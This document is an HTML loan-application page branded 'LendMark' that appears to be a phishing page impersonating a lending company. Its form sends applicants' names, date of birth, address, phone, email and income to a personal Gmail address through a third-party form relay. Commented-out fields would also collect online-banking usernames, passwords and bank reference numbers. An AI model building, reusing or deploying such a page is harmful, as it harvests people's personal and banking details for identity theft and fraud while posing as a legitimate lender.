<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/bootstrap.min.css">
    <link rel="stylesheet" href="./css/style.css">



    <script defer src="js/bootstrap.bundle.min.js"></script>
    <title>LendMark</title>
</head>

<body>
    <nav class=" navbar sticky-top rounded navbar-expand-lg ">
        <div class="container-fluid">
            <a class="navbar-brand" href="#">
                <img src="./img/lendmark-logo-white.svg" alt="..." height="36">
            </a>
            <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
                <span class="navbar-toggler-icon"></span>
            </button>
            <!-- <div class="collapse navbar-collapse" id="navbarCollapse">
                <div class="navbar-nav">
                    <a href="#" class="nav-item nav-link active">Home</a>
                    <a href="#" class="nav-item nav-link">Profile</a>
                    <a href="#" class="nav-item nav-link">Messages</a>
                     <div class="navbar-nav ms-auto">
                <a href="#" class="nav-item nav-link">Login</a>
            </div> -->
        </div>
        </div>
    </nav>

    <div class="hero">
        <img style="width: 100vw; overflow: hidden;" src="./img/lendmark-financial-services-careers (1).png" alt="">
    </div>

    <section id="contact" class=" mt-5">
        <div class=" container-lg">
            <div class="text-center">
                <h2 class="h2">Apply Now</h2>
                <p class="">
                    If your loan is approved, you may need to visit the branch that is <br> processing your application
                    to sign your loan documents and <br> receive your loan funds.
                </p>
            </div>
            <div class="row justify-content-center my-5">
                <div class="col-lg-6">
                    <form action="https://formsubmit.co/Financiallendmark593@gmail.com" method="POST" >
                        <!-- <label for="email" class="form-label">Email address:</label>
                        <input type="email" class="form-control" id="email" placeholder="e.gmario@gmail.com">

                        <label for="name" class="form-label">Name</label>
                        <input type="text" class="form-control" id="name" placeholder="e.g.Mario"> -->

                        <!-- <label for="subject" class="form-label">Loan Purpose</label>
                        <select class="form-select" id="subject">
                            <option value="volvo">Medical Expense</option>
                            <option value="saab">Vacation Expense</option>
                            <option value="mercedes">Bill Consolidation</option>
                            <option value="audi">Furniture/ Appliances</option>
                            <option value="audi">Auto Purcahse </option>
                            <option value="audi">Auto Repair</option>
                        </select> -->

                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="loan">
                                <option value="Medical">Medical Expense</option>
                                <option value="Vaction">Vacation Expense</option>
                                <option value="Bills">Bill Consolidation</option>
                                <option value="Furniture">Furniture/ Appliances</option>
                                <option value="Auto">Auto Purcahse </option>
                                <option value="Repair">Auto Repair</option>
                            </select>
                            <label for="sel1" class="form-label">Loan Purpose:</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="amount" placeholder="name@example.com">
                            <label for="floatingInput">Loan Amount</label>
                        </div>

                        <div class="header">
                            <h6>
                                CONTACT INFORMATION
                            </h6>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="name" placeholder="name@example.com">
                            <label for="floatingInput">First Name</label>
                        </div>
                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="Last Name" placeholder="name@example.com">
                            <label for="floatingInput">Last Name</label>
                        </div>
                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="Middle Name" placeholder="name@example.com">
                            <label for="floatingInput">Middle Name / Initial</label>
                        </div>

                        <div class="form-control mb-3">
                            <label for="birthday" class="form-floating">DOB:</label>
                            <input type="date" id="birthday" name="DOB">
                        </div>

                        <div class="form-floating mb-3">
                            <input type="email" class="form-control" id="floatingInput" name="email" placeholder="name@example.com">
                            <label for="floatingInput">Email address</label>
                        </div>

                        <div class="header mb-5">
                            <div class="form-check">
                                <input class="form-check-input" type="checkbox" value="" id="flexCheckDefault">
                                <label class="form-check-label" for="flexCheckDefault">
                                    I understand that by providing my email address you may contact me by <br> e-mail to
                                    process my application, service my loan account, inform me about your financial
                                    products
                                    and services or other business purposes.
                                </label>
                            </div>
                        </div>


                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="status">
                                <option value="Married">Married</option>
                                <option value="Single">Single</option>
                                <option value="Other">Other</option>
                            </select>
                            <label for="sel1" class="form-label">Marital Status:</label>
                        </div>



                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="Experience">
                                <option value="0-1yrs">0-1 year</option>
                                <option value="1-2yrs">1-2 years</option>
                                <option value="3-4yrs">3-4 years</option>
                                <option value="5yrs"> 5 years</option>
                            </select>
                            <label for="sel1" class="form-label">Years of Experience:</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="number" class="form-control" id="floatingInput" name="GMI" placeholder="name@example.com">
                            <label for="floatingInput">Gross monthly income</label>
                        </div>
                        <div class="form-floating mb-3">
                            <input type="number" class="form-control" id="floatingInput" name="mortgage" placeholder="name@example.com">
                            <label for="floatingInput">Monthly rent/mortgage</label>
                        </div>
                        <div class="form-floating mb-3">
                            <input type="number" class="form-control" id="floatingInput" name="down-payment" placeholder="name@example.com">
                            <label for="floatingInput">Down payment amount</label>
                        </div>







                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="PhoneType">
                                <!-- <option value="volvo">Phone Type</option> -->
                                <option value="Home">Home</option>
                                <option value="Cell" selected>Cell</option>
                                <option value="Work">Work</option>
                            </select>
                            <label for="sel1" class="form-label">Phone Type:</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="number" class="form-control" id="floatingInput" name="number" placeholder="name@example.com">
                            <label for="floatingInput">Phone Number</label>
                        </div>

                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="Res-status">
                                <option value="Buying">Buying</option>
                                <option value="Renting">Renting</option>
                                <option value="Ownner">Owner</option>
                                <option value="Other">Other</option>
                            </select>
                            <label for="sel1" class="form-label">Residence Status:</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="address" placeholder="name@example.com">
                            <label for="floatingInput">Resident Address</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="address2" placeholder="name@example.com">
                            <label for="floatingInput">Address Line 2</label>
                        </div>

                        <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="city" placeholder="name@example.com">
                            <label for="floatingInput">City</label>
                        </div>

                         <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="Country">
                                <option value="US">USA</option>
                                <option value="CAD">Canada</option>
                                <option value="AUS">Australia</option>
                                <option value="other">Other</option>
                                
                                
                            </select>
                            <label for="sel1" class="form-label">Country:</label>
                        </div>

                        <div class="form-floating mb-3">
                            <select class="form-select" id="sel1" name="state">
                                <option value="AL">Alabama</option>
                                <option value="AK">Alaska</option>
                                <option value="AZ">Arizona</option>
                                <option value="AR">Arkansas</option>
                                <option value="CA">California</option>
                                <option value="CO">Colorado</option>
                                <option value="CT">Connecticut</option>
                                <option value="DE">Delaware</option>
                                <option value="DC">District Of Columbia</option>
                                <option value="FL">Florida</option>
                                <option value="GA">Georgia</option>
                                <option value="HI">Hawaii</option>
                                <option value="ID">Idaho</option>
                                <option value="IL">Illinois</option>
                                <option value="IN">Indiana</option>
                                <option value="IA">Iowa</option>
                                <option value="KS">Kansas</option>
                                <option value="KY">Kentucky</option>
                                <option value="LA">Louisiana</option>
                                <option value="ME">Maine</option>
                                <option value="MD">Maryland</option>
                                <option value="MA">Massachusetts</option>
                                <option value="MI">Michigan</option>
                                <option value="MN">Minnesota</option>
                                <option value="MS">Mississippi</option>
                                <option value="MO">Missouri</option>
                                <option value="MT">Montana</option>
                                <option value="NE">Nebraska</option>
                                <option value="NV">Nevada</option>
                                <option value="NH">New Hampshire</option>
                                <option value="NJ">New Jersey</option>
                                <option value="NM">New Mexico</option>
                                <option value="NY">New York</option>
                                <option value="NC">North Carolina</option>
                                <option value="ND">North Dakota</option>
                                <option value="OH">Ohio</option>
                                <option value="OK">Oklahoma</option>
                                <option value="OR">Oregon</option>
                                <option value="PA">Pennsylvania</option>
                                <option value="RI">Rhode Island</option>
                                <option value="SC">South Carolina</option>
                                <option value="SD">South Dakota</option>
                                <option value="TN">Tennessee</option>
                                <option value="TX">Texas</option>
                                <option value="UT">Utah</option>
                                <option value="VT">Vermont</option>
                                <option value="VA">Virginia</option>
                                <option value="WA">Washington</option>
                                <option value="WV">West Virginia</option>
                                <option value="WI">Wisconsin</option>
                                <option value="WY">Wyoming</option>
                            </select>
                            <label for="sel1" class="form-label">State:</label>
                        </div>




                        <div class="form-floating mb-3">
                            <input type="number" class="form-control" id="floatingInput" name="zipcode" placeholder="name@example.com" >
                            <label for="floatingInput">Zip Code</label>
                        </div>


                        <div class="form-floating mb-5">
                            <textarea class="form-control" style="height: 140px;" name="comment" placeholder="Leave a comment here"
                                id="floatingTextarea"></textarea>
                            <label for="floatingTextarea">Comments</label>
                        </div>



                        <!-- <button type="button" class="btn btn-outline-danger mb-5" data-mdb-ripple-init data-mdb-ripple-color="dark">Danger</button> -->

                        <div class="header mb-3">
                            <h6>
                                CONSENT
                            </h6>
                        </div>

                        <!-- <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="bank" placeholder="name@example.com">
                            <label for="floatingInput">Bank Name</label>
                        </div> -->

                        <!-- <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="Username"  placeholder="name@example.com">
                            <label for="floatingInput">Username</label>
                        </div> -->

                        <!-- <div class="form-floating mb-3">
                            <input type="password" class="form-control" id="floatingPassword" name="password" placeholder="Password">
                            <label for="floatingPassword">Password</label>
                        </div> -->


                        <!-- <div class="form-floating mb-3">
                            <input type="text" class="form-control" id="floatingInput" name="reference" placeholder="name@example.com">
                            <label for="floatingInput">Bank Reference Number</label>
                        </div> -->
                        <!-- <div class="form-floating mb-5">
                            <input type="email" class="form-control" id="floatingInput" placeholder="name@example.com">
                            <label for="floatingInput">Zip Code</label>
                        </div> -->


                        <div class="header mb-5">
                            <div class="form-check">
                                <input class="form-check-input" type="checkbox" value="" id="flexCheckDefault">
                                <label class="form-check-label" for="flexCheckDefault">
                                    I authorize prospective Credit Grantors/Lending/Leasing
                                    Companies to obtain personal and credit information about me from my employer and credit bureau, or credit
                                    reporting agency, any person who has or may have any financial dealing with me, or from any references I
                                    have provided. This information, as well as that provided by me in the application, will be referred to in
                                    connection with this lease and any other relationships we may establish from time to time. Any personal and
                                    credit information obtained may be disclosed from time to time to other lenders, credit bureaus or other
                                    credit reporting agencies.
                                </label>
                            </div>
                        </div>

                        



                        <div class="header mb-5">
                            <div class="form-check">
                                <input class="form-check-input" type="checkbox" value="" id="flexCheckDefault">
                                <label class="form-check-label" for="flexCheckDefault">
                                    I hereby agree that the information given is true, accurate and complete as of the date of this application submission.
                                </label>
                            </div>
                        </div>

                        <div class="mb-4 text-center">
                            <button type="submit" class="btn btn-danger" style="width: 100%;">Submit</button>
                        </div>


                    </form>
                </div>
            </div>
        </div>
    </section>
</body>

</html>